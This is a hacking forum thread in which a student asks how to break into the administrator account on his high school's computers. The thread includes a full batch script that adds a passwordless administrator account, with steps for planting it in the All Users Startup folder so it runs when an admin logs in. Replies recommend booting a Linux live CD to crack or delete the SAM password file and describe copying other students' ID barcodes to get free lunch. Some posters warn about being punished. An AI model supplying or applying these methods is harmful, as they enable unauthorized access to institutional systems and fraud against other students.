Help hack Provincetown High!

Well… as an aspiring new hacker, I've found myself stuck with a problem. That being, that there is a five man team of rather good security people making sure NO ONE gets into anything special. Basically a crap load of security, for a small school of not so computer literate people, except for myself. Now I've been poking and prodding my way around trying to get into the administrator account on my schools computers, but with no sucess. I've tried running some sort of batch file a friend hooked me up with, but yet again… no sucess, it would tell me that the acess is denied. Anyone know any good workable methods to get through that pesky password. Ohh also I've tried Cain and Able, but the instilation of it doesn't seem to want to work on any computer whether it be school or home. Also when posting methods please keep in mind that it probably isn't going to be anything easy, their security is well built. They have almost anything that I could use as an edge denied. All in all, I'm new, and looking for someone to teach me the trade…

This is what that batch file was made of…

@echo off net user Admin2 /add /expires:never /passwordreq:no net localgroup "Administrators" /add Admin2

Along with these instructions.

Part A

1. Open Notepad

2. paste the following into notepad (no quotes)

@echo off net user Admin2 /add /expires:never /passwordreq:no net localgroup "Administrators" /add Admin2

3. Save the file as whatever.bat

// it can have whatever filename you want // but must contain the .bat file extension

4. Save the batch file to a floppy disk

Part B

// This is for if you have administrator access to the computer

1. Just run the batch file by double clicking

Part C

// This is for if you do not have access to administrator

1. put floppy in computer

2. Right click on the batch file click copy

3. go to C:Documents and Settings

// now you should see some folders with users names // look for an admin folder or an all users folder

4. open the folder, should be something like C:Documents and SettingsAll Users

// look for a startup menu folder

5. open the folder, should be someething like this C:Documents and SettingsAll UsersStart

Menu

// now look for either program files, programs, or startup

6. open the folder, should be something like this D:Documents and SettingsAll UsersStart

MenuPrograms, or D:Documents and SettingsAll UsersStart MenuProgramsStartup

// if its like the second choice skip to step 8 // now look for a start menu folder

7. open the folder, should look like this D:Documents and SettingsAll UsersStart

MenuProgramsStartup

8. Now Paste the Batch file into the Start Menu

Done! Now wait about a week (or however long u think it will take for the admin to log on and come back, try logging in as the new admin account, if it works great, you have yourself an admin account on that computer.

But keep in mind… all in all the security was too tight to get around for this method.

OOps… didn't mean to throw this in off topic. Ugh, wheres a Moderater when you need one?

sounds to me like you have pretty good physical access. just get to a computer while they're not in and whip out a Linux live disc. Find the SAM file and get cracking! I'm pretty sure there's some articles about it on this site.

slap me if I'm being a dumbass, I don't do windows at all, I can get root in 20 seconds with physical access on a Mac, but 'doze is a different story.

Wow…Thats pretty cool actually. Never knew you can do that. Sigh im such a newbie.

Don't worry… everything I've heard in the past several days is completely new to me. XD

ok, i wrote a tutorial on this kinda stuff, here is is: http://www.hellboundhackers.org/readarticle.php?article_id=30

also do you understand the consiquences of getting caught? Teachers are never understanding and will just class everything you do as malicious. check here: http://www.hellboundhackers.org/fusion_forum/viewthread.php?forum_id=19&thread_id=14

Yeah i agree with the statement about the live CD, but wouldnt it better (im assuming your very desperate to gain Admin) and delete the SAM file instead of start cracking? wouldnt it be more efficient and quicker? Although, for sure you would be good. BUt i have a nice trust CD that you boot off. Windows NT Recovery. Resets and account. Beautiful CD.

Using a Live CD to get the sam is realtively easy just follo that link so my article.

Has an admin seen this page? Are we allowed to discuss this?

well, none of us are actually encouraging him to do it, in fact scankyfrank encouraged him not to. The whole discussion has been purely hypothetical. We haven't told him anything that wasn't already on the site either.

Fair enough remember my article ;)

If you want to go for it, go for it but let me give you a word of warning.

I have been caught "hacking" school. Although I didn't get any unauthorized access, or access to restriced areas, I was still in trouble. In fact, I didn't even break the computer use rules, or the acceptable use policy for the school. I had not broken any rules, had not damaged the network, had not hijacked accounts, and yet they tried to suspened me for 180 days. I had to go to the director of legal affairs for the school district, where I had my hearing. It was only through their (for lack of a better word) kindness that they waived the punishment (although, its on my file, and if I do anything wrong I automatically get 10 days out of school).

I remember when I got there the director of legal (his name was Mr. Nelson) said that usually kids who have gotten this far in the disiplinary system have been arrested (sometimes multiple times), and have had letters from the judge that scentenced them, prpbation officers, etc. I had letters from former teachers, the mayor and other sources acting as character references and commending me for acedemic exellence.

Now, you may think that I'm just trying to either bring myself up, or that I'm being a typical whitehat, or that even I don't know WTF is going on and just need to STFU. But, trust me on this, its not worth it. You can't win. You're on uneven footing with the admins to begin with. Sure, you may have access for a month, or even a year, but eventually, you will be caught. And trust me, its not a fun time.

I agree, I was almost expelled when I finally got an admin account. USed the linux live way. Let me tell you, its not worth it. Why would you do it? So you can have access to all the web pages? YA tottaly not worth getting in trouble for. Now, if you could access and change your grades then I wouldnt have cared getting into trouble. But you cant so really there is no point.

My school network admin guy gave me access to hack the comps we just installed Linux Suse and the guy wanted me to test for vulns :) apparantly it's going on my record that I helped develop the new system lol.

i dont see wuts with the obsession over gaining administrative access at schools.

you cant really do anything with a administrator level account.

to change grades you need physical (or remote servers installed) on the teachers computers, or the computers in the office. or if ur very advanced there implementing a new system where the office simply downloads the grades they want off the teachers so u can intercept those packets and send the modified grades to the office. but in doing so u wud need hours or almost total knowledge of exactly when they will download from ur exact teachers.

to do any other sort of change u need physical (or remote servers installed) on the office computers to do something like the bell ringing at the wrong times, changing student records, ect..

the only real school hack u can do is copy the student ID codes from others and use a bar code generator to copy another students id bar code. just print it out on a sticker and put it over urs and u can get free lunch.

gaining administrative access is useless and will only lead to a horrible future if u get caught. trust me.